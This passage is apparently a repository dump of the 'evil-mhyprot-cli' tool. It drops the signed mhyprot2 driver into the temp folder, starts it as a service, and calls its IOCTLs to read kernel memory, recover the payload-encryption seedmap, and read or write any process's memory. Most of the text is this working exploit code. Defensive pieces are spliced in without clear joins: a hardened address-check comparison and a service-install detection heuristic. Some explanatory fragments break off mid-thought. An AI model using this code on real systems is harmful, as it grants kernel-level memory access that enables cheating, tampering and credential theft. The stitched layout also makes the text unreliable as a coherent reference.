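    uint32_t method;
} ioctl_fields;

static ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2) & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* The three checks visible in the disassembly of sub_FFFFF800188C63A8. */
static bool observed_gate(uint64_t src, uint32_t size, uint64_t highest_user)
{
    if (src == 0) return false;            /* test rdx, rdx / jz   */
    if (size == 0) return false;           /* test r8d, r8d / jz   */
    if (src < highest_user) return false;  /* cmp rdx, [rax] / jb  */
    return true;                           /* any other address is accepted */
}

/* Hypothetical type: one address range a reviewer would permit reads from. */
typedef struct {
    uint64_t base;
    uint64_t length;
} region;

/* Constructed sample allowlist: a single 4 KiB range. */
static const region SAMPLE_ALLOW[] = { { 0xFFFFF800188C0000ull, 0x1000ull } };

/* Hypothetical stricter gate: size cap, wrap check, and an explicit allowlist. */
static bool hardened_gate(uint64_t src, uint32_t size, uint64_t highest_user,
                          const region *allow, size_t count, uint32_t max_size)
{
    if (!observed_gate(src, size, highest_user)) return false;
    if (size > max_size) return false;
    if (src > UINT64_MAX - size) return false;      /* src + size would wrap */
    uint64_t end = src + size;                      /* exclusive end */
    for (size_t i = 0; i < count; i++) {
        const region *r = &allow[i];
        if (r->length == 0 || r->base > UINT64_MAX - r->length) continue;
        if (src >= r->base && end <= r->base + r->length) return true;
    }
    return false;
}

int main(void)
{
    /* Constructed probe addresses: user space, inside and outside the allowlist. */
    const uint64_t probes[] = {
        0x000000007FFE0000ull, 0xFFFFF800188C0010ull,
        0xFFFFF80000001000ull, 0xFFFFFFFFFFFFFFF0ull
    };
    ioctl_fields f = decode_ioctl(0x83064000u);
    printf("device_type=0x%X access=%u function=0x%X method=%u\n",
           f.device_type, f.access, f.function, f.method);
    for (size_t i = 0; i < sizeof(probes) / sizeof(probes[0]); i++) {
        printf("%016llX observed=%d hardened=%d\n",
               (unsigned long long)probes[i],
               observed_gate(probes[i], 0x20, SAMPLE_HIGHEST_USER),
               hardened_gate(probes[i], 0x20, SAMPLE_HIGHEST_USER,
                             SAMPLE_ALLOW, 1, 0x100));
    }
    return 0;
}
```

The observed gate only separates user addresses from kernel addresses, so every non-null kernel address with a non-zero size passes it; the stricter variant rejects the same requests unless they fall wholly inside an allowlisted range.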
Here are the IOCTL handlers: `0x83064000` (`MHYPROT_IOCTL_READ_KERNEL_MEMORY`) appears as `cmp ecx, 83064000h`, along with some other IOCTL codes, as follows:

Call map:
As I defined with `DWORD result` in [mhyprot.hpp#L40](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/src/mhyprot.hpp#L40), the first 4 bytes are the result.
I guess it's an `NTSTATUS`, since that is natively typedef'ed as `typedef LONG NTSTATUS`, the dispatchers' return types are `NTSTATUS`, and the result is stored directly from it.

================================================
FILE: evil-mhyprot-cli.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30320.27
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "evil-mhyprot", "src\evil-mhyprot-cli.vcxproj", "{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x64.ActiveCfg = Debug|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x64.Build.0 = Debug|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x86.ActiveCfg = Debug|Win32
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x86.Build.0 = Debug|Win32
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.ActiveCfg = Release|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.Build.0 = Release|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x86.ActiveCfg = Release|Win32
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x86.Build.0 = Release|Win32
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x64.ActiveCfg = Debug|x64
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x64.Build.0 = Debug|x64
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x86.ActiveCfg = Debug|Win32
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x86.Build.0 = Debug|Win32
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x64.ActiveCfg = Release|x64
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x64.Build.0 = Release|x64
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x86.ActiveCfg = Release|Win32
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {74DDB47F-DFB2-4765-B988-8088E5131DB1}
EndGlobalSection
EndGlobal
================================================
FILE: seedmap.txt
================================================
================================================
FILE: src/evil-mhyprot-cli.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="win_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="mhyprot.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="service_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="file_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="raw_driver.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="logger.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="win_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="mhyprot.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="service_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="file_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="nt.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="sup.hpp">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
================================================
FILE: src/evil-mhyprot-cli.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{0d17a4b4-a7c4-49c0-99e3-b856f9f3b271}</ProjectGuid>
<RootNamespace>mhyprotrootkit</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<ProjectName>evil-mhyprot-cli</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp17</LanguageStandard>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="file_utils.cpp" />
<ClCompile Include="main.cpp" />
<ClCompile Include="mhyprot.cpp" />
<ClCompile Include="service_utils.cpp" />
<ClCompile Include="win_utils.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="file_utils.hpp" />
<ClInclude Include="logger.hpp" />
<ClInclude Include="mhyprot.hpp" />
<ClInclude Include="nt.hpp" />
<ClInclude Include="raw_driver.hpp" />
<ClInclude Include="service_utils.hpp" />
<ClInclude Include="sup.hpp" />
<ClInclude Include="win_utils.hpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: src/file_utils.cpp
================================================
#include "file_utils.hpp"
//
// create file from memory
//
bool file_utils::create_file_from_buffer(
const std::string_view file_path, void* buffer, size_t size
)
{
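// a string_view is not guaranteed to be null-terminated, so copy it into a std::string first
std::ofstream stream(
std::string(file_path),
std::ios_base::out | std::ios_base::binary
);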
if (!stream.write((char*)buffer, size))
{
stream.close();
return false;
}
stream.close();
return true;
}
================================================
FILE: src/file_utils.hpp
================================================
#pragma once
#include <Windows.h>
#include <string>
#include <fstream>
namespace file_utils
{
bool create_file_from_buffer(const std::string_view file_path, void* buffer, size_t size);
}
================================================
FILE: src/logger.hpp
================================================
#pragma once
#include <cstdio> // printf
#include <iostream>
#define LOG_ERROR() \
logger::log("[!] failed at in %s:%d, (0x%lX)\n", __FILE__, __LINE__, GetLastError())
namespace logger
{
template <typename ... T>
__forceinline void log(const char* format, T const& ... args)
{
printf(format, args ...);
}
}
================================================
FILE: src/main.cpp
================================================
#include <iostream>
#include "logger.hpp"
#include "win_utils.hpp"
#include "mhyprot.hpp"
#include "sup.hpp"
#define CONTAINS(src, part) (src.find(part) != std::string::npos)
#define PRINT_USAGE() \
logger::log("[-] incorrect usage\n"); \
logger::log("[+] usage: bin.exe [process name] [option]\n"); \
logger::log("[+] example: bin.exe notepad.exe -t\n"); \
logger::log("[+] options:\n"); \
logger::log(" multiple options are available\n"); \
logger::log(" t: test\n"); \
logger::log(" d: debug prints\n"); \
logger::log(" s: print seeds\n");
//
// main entry point of this cli
//
int main(int argc, const char** argv)
{
if (argc < 3)
{
PRINT_USAGE();
return -1;
}
const std::string option(argv[2]);
if (!CONTAINS(option, "-"))
{
PRINT_USAGE();
return -1;
}
//
// find process id
//
const uint32_t process_id = win_utils::find_process_id(argv[1]);
if (!process_id)
{
logger::log("[!] process \"%s\" was not found\n", argv[1]);
return -1;
}
logger::log("[+] %s (%u)\n", argv[1], process_id);
//
// initialize its service, etc
//
if (!mhyprot::init())
{
logger::log("[!] failed to initialize vulnerable driver\n");
return -1;
}
//
// initialize driver implementations
//
if (!mhyprot::driver_impl::driver_init(
CONTAINS(option, "d"), // print debug
CONTAINS(option, "s") // print seedmap
))
{
logger::log("[!] failed to initialize driver properly\n");
mhyprot::unload();
return -1;
}
//
// perform tests
//
if (CONTAINS(option, "t"))
sup::perform_tests(process_id);
mhyprot::unload();
logger::log("[<] done!\n");
return 0;
}
================================================
FILE: src/mhyprot.cpp
================================================
#include "mhyprot.hpp"
//
// initialization of its service and device
//
bool mhyprot::init()
{
logger::log("[>] loading vulnerable driver...\n");
char temp_path[MAX_PATH];
const uint32_t length = GetTempPath(sizeof(temp_path), temp_path);
if (length > MAX_PATH || !length)
{
logger::log("[!] failed to obtain temp path. (0x%lX)\n", GetLastError());
return false;
}
//
// place the driver binary into the temp path
//
const std::string placement_path = std::string(temp_path) + MHYPROT_SYSFILE_NAME;
if (std::filesystem::exists(placement_path))
{
std::remove(placement_path.c_str());
}
//
// create driver sys from memory
//
if (!file_utils::create_file_from_buffer(
placement_path,
(void*)resource::raw_driver,
sizeof(resource::raw_driver)
))
{
logger::log("[!] failed to prepare %s. (0x%lX)\n", MHYPROT_SYSFILE_NAME, GetLastError());
return false;
}
logger::log("[>] preparing service...\n");
//
// create service using winapi, this needs administrator privilege
//
detail::mhyplot_service_handle = service_utils::create_service(placement_path);
if (!CHECK_HANDLE(detail::mhyplot_service_handle))
{
logger::log("[!] failed to create service. (0x%lX)\n", GetLastError());
return false;
}
//
// start the service
//
if (!service_utils::start_service(detail::mhyplot_service_handle))
{
logger::log("[!] failed to start service. (0x%lX)\n", GetLastError());
return false;
}
logger::log("[<] %s prepared\n", MHYPROT_SYSFILE_NAME);
//
// open the handle of its driver device
//
detail::device_handle = CreateFile(
TEXT(MHYPROT_DEVICE_NAME),
GENERIC_READ | GENERIC_WRITE,
0,
nullptr,
OPEN_EXISTING,
NULL,
NULL
);
if (!CHECK_HANDLE(detail::device_handle))
{
logger::log("[!] failed to obtain device handle (0x%lX)\n", GetLastError());
return false;
}
logger::log("[+] device handle snatched (0x%llX)\n", detail::device_handle);
logger::log("[>] mhyprot initialized successfully\n");
return true;
}
void mhyprot::unload()
{
if (detail::device_handle)
{
CloseHandle(detail::device_handle);
}
if (detail::mhyplot_service_handle)
{
service_utils::stop_service(detail::mhyplot_service_handle);
service_utils::delete_service(detail::mhyplot_service_handle);
}
}
//
// send ioctl request to the vulnerable driver
//
bool mhyprot::driver_impl::request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size)
{
//
// allocate memory for this command result
//
LPVOID out_buffer = calloc(1, in_buffer_size);
DWORD out_buffer_size = 0; // stays 0 if DeviceIoControl fails without setting it
if (!out_buffer)
{
return false;
}
//
// send the ioctl request
//
const bool result = DeviceIoControl(
mhyprot::detail::device_handle,
ioctl_code,
in_buffer,
in_buffer_size,
out_buffer,
in_buffer_size,
&out_buffer_size,
NULL
);
//
// store the result
//
if (out_buffer_size)
{
memcpy(in_buffer, out_buffer, out_buffer_size);
}
free(out_buffer);
return result;
}
//
// initialize driver implementations with payload encryption requirements
//
bool mhyprot::driver_impl::driver_init(bool debug_prints, bool print_seeds)
{
logger::log("[>] initializing driver...\n");
//
// the driver initializer
//
MHYPROT_INITIALIZE initializer;
initializer._m_002 = 0x0BAEBAEEC;
initializer._m_003 = 0x0EBBAAEF4FFF89042;
if (!request_ioctl(MHYPROT_IOCTL_INITIALIZE, &initializer, sizeof(initializer)))
{
logger::log("[!] failed to initialize mhyprot driver implementation\n");
return false;
}
//
// driver's base address in the system
//
uint64_t mhyprot_address = win_utils::
obtain_sysmodule_address(MHYPROT_SYSFILE_NAME, debug_prints);
if (!mhyprot_address)
{
logger::log("[!] failed to locate mhyprot module address. (0x%lX)\n", GetLastError());
return false;
}
logger::log("[+] %s is @ 0x%llX\n", MHYPROT_SYSFILE_NAME, mhyprot_address);
//
// read the pointer to the seedmap that is used to encrypt payloads;
// the pointer is stored at [driver.sys + 0xA0E8]
//
uint64_t seedmap_address = driver_impl::
read_kernel_memory<uint64_t>(mhyprot_address + MHYPROT_OFFSET_SEEDMAP);
logger::log("[+] seedmap in kernel [0x%llX + 0x%lX] @ (seedmap)0x%llX\n",
mhyprot_address, MHYPROT_OFFSET_SEEDMAP, seedmap_address);
if (!seedmap_address)
{
logger::log("[!] failed to locate seedmap in kernel\n");
return false;
}
//
// read the entire seedmap (0x9C0 bytes)
//
if (!driver_impl::read_kernel_memory(
seedmap_address,
&detail::seedmap,
sizeof(detail::seedmap)
))
{
logger::log("[!] failed to pickup seedmap from kernel\n");
return false;
}
for (int i = 0; i < (sizeof(detail::seedmap) / sizeof(detail::seedmap[0])); i++)
{
if (print_seeds)
logger::log("[+] seedmap (%05d): 0x%llX\n", i, detail::seedmap[i]);
}
logger::log("[<] driver initialized successfully.\n");
return true;
}
//
// generate a key for the payload
//
uint64_t mhyprot::driver_impl::generate_key(uint64_t seed)
{
uint64_t k = ((((seed >> 29) & 0x555555555 ^ seed) & 0x38EB3FFFF6D3) << 17) ^ (seed >> 29) & 0x555555555 ^ seed;
return ((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k ^ ((((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k) >> 43);
}
//
// encrypt the payload
//
void mhyprot::driver_impl::encrypt_payload(void* payload, size_t size)
{
if (size % 8)
{
logger::log("[!] (payload) size must be 8-byte aligned\n");
return;
}
if (size / 8 >= 312)
{
logger::log("[!] (payload) size must be < 0x9C0\n");
return;
}
uint64_t* p_payload = (uint64_t*)payload;
DWORD64 key_to_base = 0;
for (DWORD i = 1; i < size / 8; i++)
{
const uint64_t key = driver_impl::generate_key(detail::seedmap[i - 1]);
p_payload[i] = p_payload[i] ^ key ^ (key_to_base + p_payload[0]);
key_to_base += 0x10;
}
}
//
// read memory from the kernel using vulnerable ioctl
//
bool mhyprot::driver_impl::read_kernel_memory(uint64_t address, void* buffer, size_t size)
{
if (!buffer)
{
return false;
}
DWORD payload_size = size + sizeof(DWORD);
PMHYPROT_KERNEL_READ_REQUEST payload = (PMHYPROT_KERNEL_READ_REQUEST)calloc(1, payload_size);
if (!payload)
{
return false;
}
payload->header.address = address;
payload->size = size;
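if (!request_ioctl(MHYPROT_IOCTL_READ_KERNEL_MEMORY, payload, payload_size))
{
free(payload);
return false;
}
//
// a zero result is treated as success; release the request buffer either way
//
const bool succeeded = !payload->header.result;
if (succeeded)
{
memcpy(buffer, (PUCHAR)payload + 4, size);
}
free(payload);
return succeeded;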
}
//
// read a specific process's memory from the kernel using the vulnerable ioctl;
// this makes the driver execute MmCopyVirtualMemory
//
bool mhyprot::driver_impl::read_user_memory(
uint32_t process_id, uint64_t address, void* buffer, size_t size
)
{
MHYPROT_USER_READ_WRITE_REQUEST payload;
payload.action = MHYPROT_ACTION_READ; // action code
payload.process_id = process_id; // target process id
payload.address = address; // address
payload.buffer = (uint64_t)buffer; // our buffer
payload.size = size; // size
encrypt_payload(&payload, sizeof(payload));
return request_ioctl(
MHYPROT_IOCTL_READ_WRITE_USER_MEMORY,
&payload,
sizeof(payload)
);
}
//
// write a specific process's memory from the kernel using the vulnerable ioctl;
// this makes the driver execute MmCopyVirtualMemory
//
bool mhyprot::driver_impl::write_user_memory(
uint32_t process_id, uint64_t address, void* buffer, size_t size
)
{
MHYPROT_USER_READ_WRITE_REQUEST payload;
payload.action = MHYPROT_ACTION_WRITE; // action code
payload.process_id = process_id; // target process id
payload.address = (uint64_t)buffer; // our buffer
payload.buffer = address; // destination
payload.size = size; // size
encrypt_payload(&payload, sizeof(payload));
return request_ioctl(
MHYPROT_IOCTL_READ_WRITE_USER_MEMORY,
&payload,
sizeof(payload)
);
}
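The load sequence in mhyprot::init() above (a .sys written to the temp path, registered as a service named mhyprot2, then started) leaves a service-install record that can be triaged. The following C++ is an added example, not part of this repository: the record struct, the scoring weights and every sample record are constructed, the field names are modelled on Service Control Manager event 7045, and it assumes the service is registered as a kernel driver.

```cpp
#include <algorithm>
#include <cctype>
#include <iostream>
#include <string>
#include <vector>

// One service-install record (constructed; fields modelled on event 7045).
struct ServiceInstall {
    std::string service_name;
    std::string image_path;
    std::string service_type;  // e.g. "kernel mode driver"
    std::string start_type;    // e.g. "demand start" (kept for context, not scored)
};

struct Finding {
    int score = 0;
    std::vector<std::string> reasons;
};

static std::string lower(std::string s) {
    std::transform(s.begin(), s.end(), s.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    return s;
}

static bool contains(const std::string& haystack, const std::string& needle) {
    return haystack.find(needle) != std::string::npos;
}

// Lower-case, unify separators, drop surrounding quotes and the NT \??\ prefix.
static std::string normalise_path(std::string p) {
    p = lower(p);
    std::replace(p.begin(), p.end(), '/', '\\');
    if (!p.empty() && p.front() == '"') p.erase(0, 1);
    if (!p.empty() && p.back() == '"') p.pop_back();
    const std::string nt_prefix = "\\??\\";
    if (p.rfind(nt_prefix, 0) == 0) p.erase(0, nt_prefix.size());
    return p;
}

static std::string file_name(const std::string& path) {
    const auto pos = path.find_last_of('\\');
    return pos == std::string::npos ? path : path.substr(pos + 1);
}

// Score one record. Weights are hypothetical and chosen for this example.
Finding assess(const ServiceInstall& rec) {
    Finding f;
    const std::string path = normalise_path(rec.image_path);
    const std::string base = file_name(path);
    const bool is_driver = contains(lower(rec.service_type), "driver");
    const bool in_temp = contains(path, "\\temp\\") || contains(path, "\\tmp\\") ||
                         contains(path, "%temp%") || contains(path, "%tmp%");

    // Rule 1: a driver image loaded from a temp directory, the placement
    // mhyprot::init() uses (GetTempPath + file name).
    if (is_driver && in_temp) {
        f.score += 3;
        f.reasons.push_back("driver image located in a temp directory");
    }
    // Rule 2: names taken from the constants in mhyprot.hpp.
    if (lower(rec.service_name) == "mhyprot2" ||
        base == "mhyprot.sys" || base == "mhyprot2.sys") {
        f.score += 2;
        f.reasons.push_back("service or file name matches mhyprot constants");
    }
    return f;
}

// Constructed sample records (not real logs).
std::vector<ServiceInstall> sample_records() {
    return {
        {"mhyprot2", "C:\\Users\\alice\\AppData\\Local\\Temp\\mhyprot.sys",
         "kernel mode driver", "demand start"},
        {"upd", "\\??\\C:\\Windows\\Temp\\a.sys", "kernel mode driver", "demand start"},
        {"mhyprot2", "C:\\Program Files\\ExampleGame\\mhyprot2.sys",
         "kernel mode driver", "demand start"},
        {"ExampleDisk", "\\SystemRoot\\System32\\drivers\\exampledisk.sys",
         "kernel mode driver", "boot start"},
        {"Updater", "C:\\Users\\bob\\AppData\\Local\\Temp\\upd.exe",
         "user mode service", "auto start"},
    };
}

int count_alerts(const std::vector<ServiceInstall>& records, int threshold = 3) {
    int alerts = 0;
    for (const auto& r : records)
        if (assess(r).score >= threshold) ++alerts;
    return alerts;
}

int main() {
    for (const auto& r : sample_records()) {
        const Finding f = assess(r);
        std::cout << r.service_name << " score=" << f.score;
        for (const auto& why : f.reasons) std::cout << " [" << why << "]";
        std::cout << "\n";
    }
    std::cout << "alerts: " << count_alerts(sample_records()) << "\n";
    return 0;
}
```

The name rule only catches unrenamed copies; the driver-in-temp rule does not depend on the service or file name.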
================================================
FILE: src/mhyprot.hpp
================================================
#pragma once
#include <Windows.h>
#include <cstdint>
#include <string>
#include <fstream>
#include <filesystem>
#include "logger.hpp"
#include "raw_driver.hpp"
#include "file_utils.hpp"
#include "service_utils.hpp"
#define MHYPROT_SERVICE_NAME "mhyprot2"
#define MHYPROT_DISPLAY_NAME "mhyprot2"
#define MHYPROT_SYSFILE_NAME "mhyprot.sys"
#define MHYPROT_SYSMODULE_NAME "mhyprot2.sys"
#define MHYPROT_DEVICE_NAME "\\\\?\\\\mhyprot2"
#define MHYPROT_IOCTL_INITIALIZE 0x80034000
#define MHYPROT_IOCTL_READ_KERNEL_MEMORY 0x83064000
#define MHYPROT_IOCTL_READ_WRITE_USER_MEMORY 0x81074000
#define MHYPROT_ACTION_READ 0x0
#define MHYPROT_ACTION_WRITE 0x1
#define MHYPROT_OFFSET_SEEDMAP 0xA0E8
namespace mhyprot
{
typedef struct _MHYPROT_INITIALIZE
{
DWORD _m_001;
DWORD _m_002;
DWORD64 _m_003;
} MHYPROT_INITIALIZE, *PMHYPROT_INITIALIZE;
typedef struct _MHYPROT_KERNEL_READ_REQUEST
{
union _HEADER
{
DWORD result;
DWORD64 address;
} header;
ULONG size;
} MHYPROT_KERNEL_READ_REQUEST, *PMHYPROT_KERNEL_READ_REQUEST;
typedef struct _MHYPROT_USER_READ_WRITE_REQUEST
{
DWORD64 random_key;
DWORD action;
DWORD unknown_00;
DWORD process_id;
DWORD unknown_01;
